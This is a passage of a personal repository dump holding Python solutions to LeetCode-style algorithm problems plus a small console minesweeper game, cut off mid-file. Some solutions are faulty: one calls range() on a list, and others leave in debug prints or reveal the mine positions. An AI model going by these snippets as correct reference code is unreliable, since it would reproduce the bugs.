``` #### File: CodingChallenges/python3/best_time_stock1.py ```python class Solution: def maxProfit(self, prices: List[int]) -> int: start, dp = 10**10, 0 for i in prices: print(start) start = min(start, i) dp = max(dp, i-start) return dp ``` #### File: CodingChallenges/python3/binary_number_with_alternating_bits.py ```python class Solution: def hasAlternatingBits(self, n: int) -> bool: if n <= 1: return True bit = bin(n)[2:] truth = bit[0] for i in range(1, len(bit)): if bit[i] != truth: truth = bit[i] else: return False return True ``` #### File: CodingChallenges/python3/binary_tree_level_order_traversal_ii.py ```python from .model import TreeNode """ Space : O(n) Time : O(n) """ class Solution: def levelOrderBottom(self, root: TreeNode) -> List[List[int]]: if not root: return [] ans = [] stack = [root] while stack: temp = [] l = [] for x in stack: l.append(x.val) if x.left: temp.append(x.left) if x.right: temp.append(x.right) ans.insert(0, l) stack = temp return ans ``` #### File: CodingChallenges/python3/boats_to_save_people.py ```python class Solution: def numRescueBoats(self, people: List[int], limit: int) -> int: """ Beats 10% Time : O(n) Space : O(n) """ ans = 0 d = {} max_w, min_w = 0, 30000 for x in people: if x not in d: d[x] = 1 else: d[x] += 1 max_w = max(max_w, x) min_w = min(min_w, x) for i in range(min_w, max_w): if i not in d: d[i] = 0 s, e = min_w, max_w while s < e: if s + e > limit: ans += d[e] d[e] = 0 e -= 1 else: if d[s] == 0: s += 1 continue if d[e] == 0: e -= 1 continue slices = min(d[s], d[e]) ans += slices d[s] -= slices d[e] -= slices if d[s] == 0: s += 1 if d[e] == 0: e -= 1 if d[s] > 0: if 2 * s <= limit: ans += d[s] // 2 ans += d[s] % 2 else: ans += d[s] return ans def numRescueBoatsBest(self, people: List[int], limit: int) -> int: """ Beats 30% Time : O(n log n) Space : O(1) """ ans = 0 people.sort() s, e = 0, len(people)-1 while s <= e: if people[s] + people[e] <= limit: s += 1 e -= 1 ans += 1 return ans ``` #### File: CodingChallenges/python3/build_baloon_from_letters.py ```python def solution(S): ans = 0 truthmap = { 'B': 1, 'A': 1, 'L': 2, 'O': 2, 'N': 1, } hashmap = {} for i in S: if i not in hashmap: hashmap[i] = 1 else: hashmap[i] += 1 exist = True while exist: for key, val in truthmap.items(): if key in hashmap: if hashmap[key] - val >= 0: hashmap[key] -= val else: exist = False break else: exist = False if exist: ans += 1 return ans print(solution("BALLOONBALLOONXXBALON")) print(solution("ALEMEN")) ``` #### File: CodingChallenges/python3/bulls_and_cows.py ```python class Solution: def getHint(self, secret: str, guess: str) -> str: hashmap = {} A, B = 0, 0 guess = list(guess) for x in secret: if x not in hashmap: hashmap[x] = 1 else: hashmap[x] += 1 for i in range(len(secret)): if secret[i] == guess[i]: A += 1 hashmap[secret[i]] -= 1 guess[i] = 'x' for y in guess: if y == 'x': continue if y in hashmap: if hashmap[y] > 0: hashmap[y] -= 1 B += 1 return "{}A{}B".format(A, B) ``` #### File: CodingChallenges/python3/climbing_stairs.py ```python class Solution: def climbStairs(self, n: int) -> int: dp = [0] * 3 dp[0] = 1 dp[1] = 1 dp[2] = 2 if n < 3: return dp[n] dp = dp + ([0] * (n-2)) for i in range(3, n+1): dp[i] = dp[i-1] + dp[i-2] return dp[n] ``` #### File: CodingChallenges/python3/combination_sum_3.py ```python from itertools import combinations """ Space : O(n) Time : O(n!) """ class Solution: def combinationSum3(self, k: int, n: int) -> List[List[int]]: ans = [] for item in combinations(range(1, 10), k): temp = list(item) if sum(temp) == n: ans.append(temp) return ans ``` #### File: CodingChallenges/python3/contains_duplicate_3.py ```python class Solution: def containsNearbyAlmostDuplicate(self, nums: List[int], k: int, t: int) -> bool: if t == 0 and len(nums) == len(set(nums)): return False for i, cur_val in enumerate(nums): for j in range(i+1, min(i+k+1, len(nums))): if abs(cur_val - nums[j]) <= t: return True return False ``` #### File: CodingChallenges/python3/contains_duplicate.py ```python class Solution: def containsDuplicate(self, nums: List[int]) -> bool: set_nums = set(nums) if len(set_nums) < len(nums): return True else: return False ``` #### File: CodingChallenges/python3/convert_to_base7.py ```python class Solution: def convertToBase7(self, num: int) -> str: ans = '' multi = 1 isNeg = num < 0 num = abs(num) while multi * 7 <= num: multi *= 7 while multi >= 1: ans += str(num // multi) if num >= 0: num = int(num % multi) else: ans += str(num) multi //= 7 if isNeg: ans = '-' + ans return ans ``` #### File: CodingChallenges/python3/copy_list_with_random_pointer.py ```python from .model import RandListNode """ Space : O(2n) Time : O(2n) """ class Solution: def copyRandomList(self, head: RandListNode) -> RandListNode: p = head # create interweaved list while p: # save value to next creation value = p.val temp = p.next # insert copied current node p.next = RandListNode(value) p = p.next # point back to original next p.next = temp p = p.next # migrate random node p = head while p: if p.random: # save rand rand = p.random # insert rand to new rand p = p.next p.random = rand.next p = p.next else: p = p.next.next # create new node ans = RandListNode(0) a = ans p = head while p: # move next p = p.next # insert to ans a.next = p # move to next element a = a.next p = p.next return ans.next ``` #### File: CodingChallenges/python3/count_binary_substrings.py ```python class Solution: def countBinarySubstrings(self, s: str) -> int: ans = 0 last = s[0] one = 1 if s[0] == '1' else 0 zero = 1 if s[0] == '0' else 0 n = len(s) for i in range(1, n): if s[i] != last: ans += min(one, zero) if s[i] == '0': zero = 1 else: one = 1 else: if s[i] == '0': zero += 1 else: one += 1 last = s[i] ans += min(one, zero) return ans ``` #### File: CodingChallenges/python3/determine_if_string_halves_are_alike.py ```python class Solution: def halvesAreAlike(self, s: str) -> bool: n = len(s) v1, v2 = 0, 0 for i in range(n//2): if s[i].lower() in ['a', 'e', 'i', 'o', 'u']: v1 += 1 if s[i+(n//2)].lower() in ['a', 'e', 'i', 'o', 'u']: v2 += 1 return v1 == v2 ``` #### File: CodingChallenges/python3/divide_two_integers.py ```python class Solution: def divide(self, dividend: int, divisor: int) -> int: if dividend == 0: return 0 is_neg = True if dividend < 0 else False is_neg ^= True if divisor < 0 else False dividend = abs(dividend) divisor = abs(divisor) ans, count = 0, 1 temp = divisor while (divisor << 1) <= dividend: divisor <<= 1 count *= 2 while dividend >= divisor and dividend > 0: dividend -= divisor ans += count while dividend < divisor: divisor >>= 1 count >>= 1 if divisor < temp: break if is_neg: return -1 * min(ans, (2 ** 31)) return min(ans, (2**31) - 1) ``` #### File: CodingChallenges/python3/duplicate_zeros.py ```python class Solution: def duplicateZeros(self, arr: List[int]) -> None: """ Do not return anything, modify arr in-place instead. """ n = len(arr) stack = [] i = 0 while i < n: if arr[i] == 0: stack.append(0) stack.append(arr[i]) i += 1 for j in range(n): arr[j] = stack[j] ``` #### File: CodingChallenges/python3/even_numbers.py ```python class Solution: def findNumbers(self, nums: List[int]) -> int: ans = 0 for i in nums: if len(str(i)) % 2 == 0: ans += 1 return ans ``` #### File: CodingChallenges/python3/find_and_replace_pattern.py ```python class Solution: def findAndReplacePattern(self, words: List[str], pattern: str) -> List[str]: ans = [] pn = len(pattern) for word in words: if len(word) != pn: continue mem1, mem2 = {}, {} defect = False for i in range(pn): if word[i] not in mem1: mem1[word[i]] = pattern[i] elif mem1[word[i]] != pattern[i]: defect = True break if pattern[i] not in mem2: mem2[pattern[i]] = word[i] elif mem2[pattern[i]] != word[i]: defect = True break if defect: continue if len(mem1) == len(mem2): ans.append(word) return ans ``` #### File: CodingChallenges/python3/find_first_and_last_position_of_element_in_sorted_array.py ```python class Solution: def searchRange(self, nums: List[int], target: int) -> List[int]: ans = [-1, -1] s, e = 0, len(nums)-1 if not nums: return ans while s < e: m = (s + e) // 2 if nums[m] < target: s = m + 1 else: e = m if nums[e] != target: return [-1, -1] ans[0] = e e = len(nums)-1 while s < e: m = ((s + e) // 2)+1 if nums[m] <= target: s = m else: e = m - 1 ans[1] = e return ans ``` #### File: CodingChallenges/python3/find_the_most_competitive_subsequence.py ```python class Solution: def mostCompetitive(self, nums: List[int], k: int) -> List[int]: stack = [] i = 0 n = len(nums) while i < n: while stack and nums[i] < stack[-1] and n-i+len(stack) > k: stack.pop() if len(stack) < k: stack.append(nums[i]) i += 1 return stack ``` #### File: CodingChallenges/python3/fizzbuzz.py ```python class Solution: def fizzBuzz(self, n: int) -> List[str]: ans = [] for i in range(1, n+1): word = '' if i % 3 == 0: word += 'Fizz' if i % 5 == 0: word += "Buzz" if word == '': word = str(i) ans.append(word) return ans ``` #### File: CodingChallenges/python3/flipping_an_image.py ```python class Solution: def flipAndInvertImage(self, A: List[List[int]]) -> List[List[int]]: for row in A: for i in range((len(row) + 1) // 2): """ In Python, the shortcut row[~i] = row[-i-1] = row[len(row) - 1 - i] helps us find the i-th value of the row, counting from the right. """ row[i], row[~i] = row[~i] ^ 1, row[i] ^ 1 return A ``` #### File: CodingChallenges/python3/hamming_distance.py ```python class Solution: def hammingDistance(self, x: int, y: int) -> int: ans = 0 xor = bin(x^y)[2:] for l in xor: if l == '1': ans += 1 return ans ``` #### File: CodingChallenges/python3/house_robber_ii.py ```python class Solution: def rob(self, nums: List[int]) -> int: if len(nums) == 1: return nums[0] if len(nums) == 0: return 0 ans = 0 leng = len(nums)-1 one, two = [0] * leng, [0] * leng # 1st iteration for idx in range(leng): if idx < 2: one[idx] = nums[idx] else: one[idx] = nums[idx] + max(one[idx-2], one[idx-3]) ans = max(ans, one[idx]) # 2nd iteration for idx in range(leng): if idx < 2: two[idx] = nums[idx+1] else: two[idx] = nums[idx+1] + max(two[idx-2], two[idx-3]) ans = max(ans, two[idx]) return ans ``` #### File: CodingChallenges/python3/increasing_order_search_tree.py ```python from .model import TreeNode """ Space : O(n) Time : O(n) """ class Solution: def getInorder(self, root) -> List[int]: res = [] if root: res += self.getInorder(root.left) res.append(root.val) res += self.getInorder(root.right) return res def increasingBST(self, root: TreeNode) -> TreeNode: if not root: return root vals = self.getInorder(root) # create tree ans = TreeNode() head = ans for i in vals: head.right = TreeNode(i) head = head.right return ans.right ``` #### File: CodingChallenges/python3/insertion_sort_list.py ```python from .model import ListNode """ Space : O(n) Time : O(n**2) """ class Solution: def insertionSortList(self, head: ListNode) -> ListNode: if not head: return head mem = [] point = head while point: mem.append(point.val) point = point.next n = len(mem) stack = [] for i in range(n): stack.append(mem[i]) j = len(stack) - 1 while j > 0: if stack[j] < stack[j-1]: temp = stack[j-1] stack[j-1] = stack[j] stack[j] = temp else: break j -= 1 ans = ListNode(stack[0]) p = ans for i in range(1, len(stack)): p.next = ListNode(stack[i]) p = p.next return ans ``` #### File: CodingChallenges/python3/intersection_of_array.py ```python class Solution: def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]: if len(nums1) < len(nums2): item1 = nums1 item2 = nums2 else: item1 = nums2 item2 = nums1 credit = {} for i in item2: if i in credit: credit[i] += 1 else: credit[i] = 1 ans = [] for j in item1: if j in credit: if credit[j] > 0: ans.append(j) credit[j] -= 1 return ans ``` #### File: CodingChallenges/python3/jump_game.py ```python class Solution: def canJump(self, nums: List[int]) -> bool: n = len(nums) if n == 1: return True cred = 0 i = 0 while True: cred = max(cred, nums[i]) if cred + i >= n-1: return True if cred == 0: break i += 1 cred -= 1 return False ``` #### File: CodingChallenges/python3/keyboard_row.py ```python class Solution: def findWords(self, words: List[str]) -> List[str]: ans = [] truth = { 'q': 1, 'w': 1, 'e': 1, 'r': 1, 't': 1, 'y': 1, 'u': 1, 'i': 1, 'o': 1, 'p': 1, 'a': 2, 's': 2, 'd': 2, 'f': 2, 'g': 2, 'h': 2, 'j': 2, 'k': 2, 'l': 2, 'z': 3, 'x': 3, 'c': 3, 'v': 3, 'b': 3, 'n': 3, 'm': 3, } for item in words: oneline = True check = item.lower() line = truth[check[0]] for i in range(1, len(check)): if truth[check[i]] != line: oneline = False if oneline: ans.append(item) return ans ``` #### File: CodingChallenges/python3/kth_largest_element_in_an_array.py ```python class Solution: def findKthLargest(self, nums: List[int], k: int) -> int: return sorted(nums)[-k] ``` #### File: CodingChallenges/python3/letter_case_permutation.py ```python class Solution: def letterCasePermutation(self, S: str) -> List[str]: def permute(S, path): if len(S) == 0: ans.append(path) return if S[0].isalpha(): permute(S[1:], path + S[0].upper()) permute(S[1:], path + S[0].lower()) else: permute(S[1:], path + S[0]) ans = [] permute(S, '') return ans ``` #### File: CodingChallenges/python3/linked_list_cycle_II.py ```python from .model import ListNode """ Space : O(1) Time : O(n) """ # Definition for singly-linked list. # class ListNode: # def __init__(self, x): # self.val = x # self.next = None class Solution: def detectCycle(self, head: ListNode) -> ListNode: if not head: return None h1 = head h2 = head cyclical = True while h1 or h2: h1 = h1.next h2 = h2.next if h2: h2 = h2.next if not h2 or not h1: cyclical = False break if h1.val == h2.val: if h1.next.val == h2.next.val: break if not cyclical: return None point = head while True: if point.val == h1.val: if point.next.val == h1.next.val: return point point = point.next h1 = h1.next ``` #### File: CodingChallenges/python3/linked_list_cycle.py ```python from .model import ListNode """ Space : O(1) Time : O(n) """ class Solution: def hasCycle(self, head: ListNode) -> bool: if not head: return None h1 = head h2 = head while h1 or h2: h1 = h1.next h2 = h2.next if h2: h2 = h2.next if not h2 or not h1: return False if h1.val == h2.val: if h1.next.val == h2.next.val: break return True ``` #### File: CodingChallenges/python3/longest_increasing_subsequence.py ```python from bisect import bisect_left # Space : O(n) # Time : O(n log n) class Solution: def lengthOfLIS(self, nums: List[int]) -> int: sub = [] for num in nums: i = bisect_left(sub, num) if i == len(sub): sub.append(num) else: sub[i] = num return len(sub) ``` #### File: CodingChallenges/python3/longest_mountain_in_array.py ```python class Solution: def insertStack(self, stack: List[int], direction: str) -> List[int]: if len(stack) > 0: if stack[-1][0] == direction: stack[-1][1] += 1 else: stack.append([direction, 1]) else: stack.append([direction, 1]) return stack def longestMountain(self, A: List[int]) -> int: """ Personal Attempt Space : O(n) Time : O(n) """ ans = 0 n = len(A) stack = [] for i in range(1, n): if A[i] > A[i-1]: stack = self.insertStack(stack, "u") elif A[i] == A[i-1]: stack = self.insertStack(stack, "s") else: stack = self.insertStack(stack, "d") m = len(stack) if m == 1: return 0 for j in range(m-1): c1, c2 = stack[j], stack[j+1] if c1[0] == "u" and c2[0] == "d": ans = max(ans, c1[1] + c2[1] + 1) return ans def longestMountain2(self, A: List[int]) -> int: """ Best Solution Space : O(1) Time : O(n) """ lastup = lastdown = ans = was = 0 for i in range(1, len(A)): if A[i]-A[i-1] > 0: lastdown = 0 lastup += 1 elif A[i]-A[i-1] < 0: if lastup > 0: was = lastup + 1 lastup = 0 lastdown += 1 if was > 0: ans = max(ans, was+lastdown) else: lastdown = 0 lastup = 0 was = 0 return ans ``` #### File: CodingChallenges/python3/majority_element_2.py ```python class Solution: def majorityElement(self, nums: List[int]) -> List[int]: ans = [] if len(nums) == 0: return ans hashmap = {} N = len(nums) for i in nums: if i not in hashmap: hashmap[i] = 1 else: hashmap[i] += 1 for k, v in hashmap.items(): if v > int(N/3): ans.append(k) return ans ``` #### File: CodingChallenges/python3/max_area_of_island.py ```python class Solution: def crawl(self, grid, x, y): def bfs(dx, dy): nonlocal area if grid[dy][dx] == 1: area += 1 grid[dy][dx] = 0 elif grid[dy][dx] == 0: return for ax, ay in c: if 0 <= dy + ay < row and 0 <= dx + ax < col: if grid[dy+ay][dx+ax] == 1: bfs(dx+ax, dy+ay) row = len(grid) col = len(grid[0]) c = [(0, 1), (0, -1), (1, 0), (-1, 0)] area = 0 bfs(x, y) return area def maxAreaOfIsland(self, grid: List[List[int]]) -> int: row = len(grid) col = len(grid[0]) ans = 0 for y in range(row): for x in range(col): if grid[y][x] == 1: ans = max(ans, self.crawl(grid, x, y)) return ans ``` #### File: CodingChallenges/python3/maximize_distance_to_closest_person.py ```python class Solution: def maxDistToClosest(self, seats: List[int]) -> int: dist1, dist2 = 0, 0 temp1, temp2 = 0, 0 n = len(seats) for i in range(n): # forward if seats[i] == 0: temp1 += 1 dist1 = max(dist1, temp1) else: temp1 = 0 # backward if seats[n-1-i] == 0: temp2 += 1 dist2 = max(dist2, temp2) else: temp2 = 0 if dist1 % 2 == 1: mid = (dist1+1) // 2 else: mid = (dist1) // 2 return max(mid, temp1, temp2) ``` #### File: CodingChallenges/python3/maximum_depth_of_n-ary_tree.py ```python from .model import NaryNode # Space : O(n) # Time : O(n) class Solution: def maxDepth(self, root: NaryNode) -> int: if not root: return 0 ans = 0 stack = [root] while stack: ans += 1 temp = [] for node in stack: if node: temp += node.children stack = temp return ans ``` #### File: CodingChallenges/python3/maximum_difference_between_node_and_ancestor.py ```python from .model import TreeNode """ Space : O(n) Time : O(n) """ class Solution: def maxAncestorDiff(self, root: TreeNode) -> int: if not root: return 0 ans = 0 stack = [(root, 10**6, -1)] while stack: node, minv, maxv = stack.pop() minv = min(minv, node.val) maxv = max(maxv, node.val) if not node.left and not node.right: ans = max(ans, abs(maxv - minv)) if node.left: stack.append((node.left, minv, maxv)) if node.right: stack.append((node.right, minv, maxv)) return ans ``` #### File: CodingChallenges/python3/maximum_product_of_word_lengths.py ```python class Solution: def maxProduct(self, words: List[str]) -> int: def checkContainedKey(a, b): for k in a.keys(): if k in b: return True return False ans = 0 word_dicts = [] for word in words: d = {} m = len(word) for letter in word: d[letter] = 1 word_dicts.append(d) n = len(word_dicts) for i in range(n): for j in range(i+1, n): if not checkContainedKey(word_dicts[i], word_dicts[j]): ans = max(ans, len(words[i]) * len(words[j])) return ans ``` #### File: CodingChallenges/python3/min_cost_for_tickets.py ```python class Solution: def mincostTickets(self, days: List[int], costs: List[int]) -> int: num = 366 one, seven, thirty = costs dp = [0] * num idx = 0 for i in range(1, num): dp[i] = dp[i-1] if i == days[idx]: dp[i] = min( one+dp[i-1 if i-1>0 else 0], seven+dp[i-7 if i-7>0 else 0], thirty+dp[i-30 if i-30>0 else 0] ) if idx != len(days)-1: idx += 1 else: break return dp[days[idx]] ``` #### File: CodingChallenges/python3/minesweeper.py ```python import random def spawnBombs(mines, row, col): mines_coords = set() while mines > 0: y = random.randint(0, row-1) x = random.randint(0, col-1) if (x, y) not in mines_coords: mines_coords.add((x, y)) mines -= 1 return mines_coords def createBoard(row, col): board = [] for i in range(row): board.append(['O' for j in range(col)]) return board def calculateBoard(row, col, mine_coords): board = createBoard(row, col) c = [(0, -1), (0, 1), (-1, 0), (1, 0), (-1, -1), (-1, 1), (1, -1), (1, 1)] for y in range(row): for x in range(col): if (x, y) in mine_coords: board[y][x] = 'X' for ax, ay in c: if (0 <= x + ax < col) and (0 <= y + ay < row) and (x + ax, y + ay) not in mine_coords: if board[y+ay][x+ax] == 'O': board[y+ay][x+ax] = '1' elif board[y+ay][x+ax].isdigit(): board[y+ay][x + ax] = str(int(board[y+ay][x+ax])+1) return board def printBoard(board): rows = len(board) cols = len(board[0]) for y in range(rows+2): if y == 0: line = " " for x in range(cols): line += "{} ".format(x) elif y == 1: line = " " for x in range(cols): line += "= " else: line = "{} | ".format(y-2) for x in range(cols): line += "{} ".format(board[y-2][x]) print(line) def openBoard(board, ans_board, x, y): def dfs(dx, dy): if board[dy][dx] == 'O': if ans_board[dy][dx].isdigit(): board[dy][dx] = ans_board[dy][dx] return board board[dy][dx] = '_' for ax, ay in c: if (0 <= dx + ax < col) and (0 <= dy + ay < row): dfs(dx + ax, dy + ay) c = [(0, -1), (0, 1), (-1, 0), (1, 0), (-1, -1), (-1, 1), (1, -1), (1, 1)] row = len(board) col = len(board[0]) dfs(x, y) return board def checkIsWin(board, mine_coords): row = len(board) col = len(board[0]) for y in range(row): for x in range(col): if board[y][x] == 'O' and (x, y) not in mine_coords: return False return True def checkBoard(board, ans_board, mine_coords, x, y): # hit mine if (x, y) in mine_coords: for bx, by in mine_coords: board[by][bx] = 'X' return board, "lose" # already inputted validation if board[y][x].isdigit() or board[y][x] == " ": print("coordinate {} {} has already inputted") print("please choose another coordinate") return board, "continue" # check for new hit board = openBoard(board, ans_board, x, y) # check if there's still coord to choose # otherwise, player wins isWin = checkIsWin(board, mine_coords) if isWin: return board, "win" return board, "continue" def playGame(): mines = 5 row = 5 col = 10 board = createBoard(row, col) mine_coords = spawnBombs(mines, row, col) ans_board = calculateBoard(row, col, mine_coords) print(mine_coords) printBoard(ans_board) result = "continue" while result == "continue": printBoard(board) print("Input coordinate (x y). example: 0 1") user_input = input() x, y = user_input.split(" ") board, result = checkBoard( board, ans_board, mine_coords, int(x), int(y)) if result == "win" or result == "lose": printBoard(board) return result return result if __name__ == "__main__": print("===== MINESWEEPER =====") print("1. Play game") print("2. Quit") print("Enter number: ") action = input() if action == '1': result = playGame() if result == "win": print("CONRATULATIONS, YOU WIN!") elif result == "lose": print("YOU LOSE!") ``` #### File: CodingChallenges/python3/minimum_depth_of_binary_tree.py ```python from .model import TreeNode """ Space : O(n) Time : O(n) """ class Solution: def minDepth(self, root: TreeNode) -> int: if not root: return 0 res = [] stack = [(root, 1)] while stack: node, ls = stack.pop() if not node.left and not node.right: res.append(ls) if node.right: stack.append((node.right, ls+1)) if node.left: stack.append((node.left, ls+1)) return min(res) ``` #### File: CodingChallenges/python3/minimum_moves_to_equal_array_elements.py ```python class Solution: def minMoves(self, nums: List[int]) -> int: min_num = min(nums) ans = 0 for x in nums: ans += x - min_num return ans ``` #### File: CodingChallenges/python3/minimum_operations_to_reduce_x_to_zero.py ```python class Solution: def minOperations(self, nums: List[int], x: int) -> int: longest = 0 n = len(nums) k = sum(nums) - x d = {} d[0] = 0 if k == 0: return len(nums) i, count = 0, 0 while i < n: count += nums[i] d[count] = i+1 if count - k in d: longest = max(longest, i - d[count-k]+1) i += 1 if longest > 0: return n - longest return -1 ``` #### File: CodingChallenges/python3/minimum_unique_sum.py ```python def getMinimumUniqueSum(arr): ans = 0 dp = [0] * 7000 for i in arr: dp[i] += 1 n = len(dp) for i in range(n-1): if dp[i] > 1: dp[i+1] += dp[i] - 1 dp[i] = 1 for j in range(n): if dp[j] > 0: ans += j return ans ``` #### File: CodingChallenges/python3/mirror_reflection.py ```python import math class Solution: def mirrorReflection(self, p: int, q: int) -> int: """ Personal Attempt Space : O(1) Time : O(n) """ # get Highest Common Factor # T = O(log(ab)) g = math.gcd(p, q) h, w = p, q x, y = 0, 0 while True: if x == w: mx = -g elif x == 0: mx = g if y == h: my = -g elif y == 0: my = g x += mx y += my if (x, y) == (q, 0): return 0 if (x, y) == (q, p): return 1 if (x, y) == (0, p): return 2 def mirrorReflectionBest(self, p: int, q: int) -> int: """ Best Solution Space : O(1) Time : O(log(pq)) """ g = math.gcd(p, q) m, n = q // g, p // g if n % 2 == 0: return 2 return m % 2 ``` #### File: CodingChallenges/python3/number_of_1_bits.py ```python class Solution: def hammingWeight(self, n: int) -> int: ans = 0 binary = bin(n)[2:] n = len(binary) for i in binary: if i == '1': ans += 1 return ans ``` #### File: CodingChallenges/python3/number_of_longest_increasing_subsequence.py ```python def findNumberOfLIS(self, nums): N = len(nums) if N <= 1: return N lengths = [0] * N # lengths[i] = longest ending in nums[i] counts = [1] * N # count[i] = number of longest ending in nums[i] for j in range(nums): for i in range(j): if nums[i] < nums[j]: if lengths[i] >= lengths[j]: lengths[j] = 1 + lengths[i] counts[j] = counts[i] elif lengths[i] + 1 == lengths[j]: counts[j] += counts[i] longest = max(lengths) return sum(c for i, c in enumerate(counts) if lengths[i] == longest) ``` #### File: CodingChallenges/python3/partition_array_into_three_parts_with_equal_sum.py ```python class Solution: def canThreePartsEqualSum(self, arr: List[int]) -> bool: mean = sum(arr) / 3 if mean % 1 > 0: return False mean = int(mean) count = 0 subarr = 0 for i in arr: count += i if count == mean: count = 0 subarr += 1 if subarr == 3: return True return False ``` #### File: CodingChallenges/python3/pascals_triangle.py ```python class Solution: def generate(self, numRows: int) -> List[List[int]]: ans = [] for i in range(1, numRows+1): temp = [] for j in range(1, i+1): if (j == 1) or (j == i): temp.append(1) else: temp.append(ans[i-2][j-2] + ans[i-2][j-1]) ans.append(temp) return ans ``` #### File: CodingChallenges/python3/perfect_number.py ```python import math class Solution: def checkPerfectNumber(self, num: int) -> bool: if num <=1: return False total = 1 s, e = 2, math.ceil(math.sqrt(num)) while s < e: if num % s == 0: total += s total += num // s s += 1 return total == num ``` #### File: CodingChallenges/python3/permutations.py ```python from itertools import permutations # Space : O(n^2) # Time : O(n!) class Solution: def permute(self, nums: List[int]) -> List[List[int]]: res = [] perm = permutations(nums) for p in perm: res.append(list(p)) return res ``` #### File: CodingChallenges/python3/power_of_two.py ```python class Solution: def isPowerOfTwo(self, n: int) -> bool: if n <= 0: return False ones = 0 binary = bin(n)[2:] for i in binary: if i == "1": ones += 1 if ones == 1: return True return False ``` #### File: CodingChallenges/python3/range_sum_query_2d-immutable.py ```python class NumArray: def __init__(self, nums: List[int]): self.arr = nums.copy() def sumRange(self, i: int, j: int) -> int: ans = 0 for idx in range(i, j+1): ans += self.arr[idx] return ans # Your NumArray object will be instantiated and called as such: # obj = NumArray(nums) # param_1 = obj.sumRange(i,j) ``` #### File: CodingChallenges/python3/remove_covered_intervals.py ```python class Solution: def removeCoveredIntervals(self, intervals: List[List[int]]) -> int: ans = 0 intervals.sort(key=lambda a: (a[0], -a[1])) end = 0 for i, j in intervals: if j > end: ans += 1 end = max(end, j) return ans ``` #### File: CodingChallenges/python3/remove_duplicates_from_sorted_array_II.py ```python class Solution: def removeDuplicates(self, nums: List[int]) -> int: n = len(nums) if n <= 2: return n i = 0 while i < len(nums) - 2: while nums[i] == nums[i+2]: nums.pop(i) if i >= len(nums)-2: break i += 1 return len(nums) ``` #### File: CodingChallenges/python3/remove_linked_list_elements.py ```python from .model import ListNode """ Space : O(1) Time : O(n) """ class Solution: def deleteNode(self, head, key): temp = head while temp: if temp.val == key: temp = temp.next else: break head = temp prev = head while temp: if temp.val == key: prev.next = temp.next else: prev = temp temp = temp.next return head def removeElements(self, head: ListNode, val: int) -> ListNode: res = self.deleteNode(head, val) return res ``` #### File: CodingChallenges/python3/reverse_words_in_a_string_iii.py ```python class Solution: def reverseWords(self, s: str) -> str: l = s.split(" ") for i in range(len(l)): l[i] = l[i][::-1] return " ".join(l) ``` #### File: CodingChallenges/python3/score_of_parentheses.py ```python class Solution: def scoreOfParentheses(self, S: str) -> int: ans = 0 pwr = -1 isAdded = False for l in S: if l == "(": pwr += 1 isAdded = False else: if not isAdded: ans += 2 ** pwr isAdded = True pwr -= 1 return ans ``` #### File: CodingChallenges/python3/search_in_rotated_sorted_array_II.py ```python class Solution: def search(self, nums: List[int], target: int) -> bool: if len(nums) == 0: return False s, e = 0, len(nums)-1 while s <= e: mid = (s+e) // 2 if nums[mid] == target: return True # check left if nums[s] < nums[mid]: if nums[s] <= target < nums[mid]: e = mid - 1 else: s = mid + 1 elif nums[s] == nums[mid]: s += 1 # check right else: if nums[mid] < target <= nums[e]: s = mid + 1 else: e = mid - 1 return False ``` #### File: CodingChallenges/python3/search_insert_position.py ```python class Solution: def searchInsert(self, nums: List[int], target: int) -> int: ans = 0 leng = len(nums) for idx in range(leng): if nums[idx] == target: break elif nums[idx] > target: break ans += 1 return ans ``` #### File: CodingChallenges/python3/short_encoding_of_words.py ```python class Solution: def minimumLengthEncoding(self, W: List[str]) -> int: wset = set(W) for word in W: if word in wset: for i in range(1, len(word)): wset.discard(word[i:]) print(word, wset) return len("#".join(list(wset))) + 1 ``` #### File: CodingChallenges/python3/single_number_3.py ```python class Solution: def singleNumber(self, nums: List[int]) -> List[int]: hashmap = {} res = [] for i in nums: if i in hashmap: hashmap[i] += 1 else: hashmap[i] = 1 for key, val in hashmap.items(): if val == 1: res.append(key) return res ``` #### File: CodingChallenges/python3/smallest_range_ii.py ```python class Solution: def smallestRangeII(self, A: List[int], K: int) -> int: A.sort() ans = A[-1] - A[0] for x, y in zip(A, A[1:]): ans = min(ans, max(A[-1]-K, x+K) - min(A[0]+K, y-K)) return ans ``` #### File: CodingChallenges/python3/smallest_string_with_a_given_numeric_value.py ```python class Solution: def getSmallestString(self, n: int, k: int) -> str: """ Personal Attempt Space : O(1) Time : O(n) """ zs = 0 while k - 26 >= n - 1: zs += 1 k -= 26 n -= 1 mid = '' if k > n: mid = chr(96 + k - n + 1) k = k - n + 1 n -= 1 return 'a' * n + mid + 'z' * zs def getSmallestStringBest(self, n: int, k: int) -> str: """ Best solution Math approach Space : O(1) Time : O(1) """ # let there be x 'a', and z 'z' and maybe another alphabet 'y' # case 1: no need for y # 1.x + 26.z = k # x + z = n # x + 26(n-x) = k # 25x = 26n-k # case 2: y is needed and it can be from 2 to 25 # 1.x + y + 26z = k # x + z = n - 1 or z = n - 1 - x # x + y + 26(n - 1 - x) = k # -25x + y + 26n - 26 - k = 0 # 25x = 26n - k - 26 + y if (26*n - k) % 25 == 0: # case 1 x = (26*n - k)//25 ans = 'a'*x + 'z'*(n-x) else: # case 2 temp = 26*n - k - 26 if temp < 0: x = 0 y = -temp else: y = 25-(temp % 25) x = (temp+y)//25 ans = 'a'*x + chr(ord('a')-1+y) + 'z'*(n-1-x) return ans ``` #### File: CodingChallenges/python3/squares_of_a_sorted_array.py ```python class Solution: def sortedSquares(self, nums: List[int]) -> List[int]: temp1, temp2, ans = [], [], [] n = len(nums) i = 0 while i < n: if nums[i] < 0: temp1.insert(0, nums[i] ** 2) else: temp2.append(nums[i] ** 2) i += 1 if not temp1: return temp2 elif not temp2: return temp1 x, y = 0, 0 while x < len(temp1) and y < len(temp2): if temp1[x] < temp2[y]: ans.append(temp1[x]) x += 1 else: ans.append(temp2[y]) y += 1 if x == len(temp1): ans += temp2[y:] if y == len(temp2): ans += temp1[x:] return ans ``` #### File: CodingChallenges/python3/strong_password.py ```python import re def minimumNumber(n, password): # Return the minimum number of characters to make the password strong ans = 0 low = re.findall("[a-z]", password) if not low: ans += 1 up = re.findall("[A-Z]", password) if not up: ans += 1 dig = re.findall("[0-9]", password) if not dig: ans += 1 spe = re.findall("[!@#$%^&*()\-+]", password) if not spe: ans += 1 if n + ans < 6: return 6 - n return ans ``` #### File: CodingChallenges/python3/sum_root_to_leaf_bin_tree.py ```python from .model import TreeNode class Solution: def sumRootToLeaf(self, 